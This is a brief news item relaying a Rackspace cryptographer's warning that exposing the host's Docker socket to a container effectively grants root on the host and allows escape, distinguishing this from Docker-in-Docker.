A cryptographer at Rackspace recently blogged a warning to all Docker users: Don't expose the Docker sockets, even if it's to a container.
He writes that many developers believe that when you get write access to a Docker socket from a container that it doesn't effectively give you root access (it does) or that it keeps your access limited to that container without a way to break out (you can).
Write access to the Docker socket is root on the host, regardless on where that write comes from. This is different from Jerome Pettazoni's
dind, which gives you Docker-in-Docker;we're talking about access to the host's Docker socket.
He even made a video to demonstrate the flaw in one developer's setup: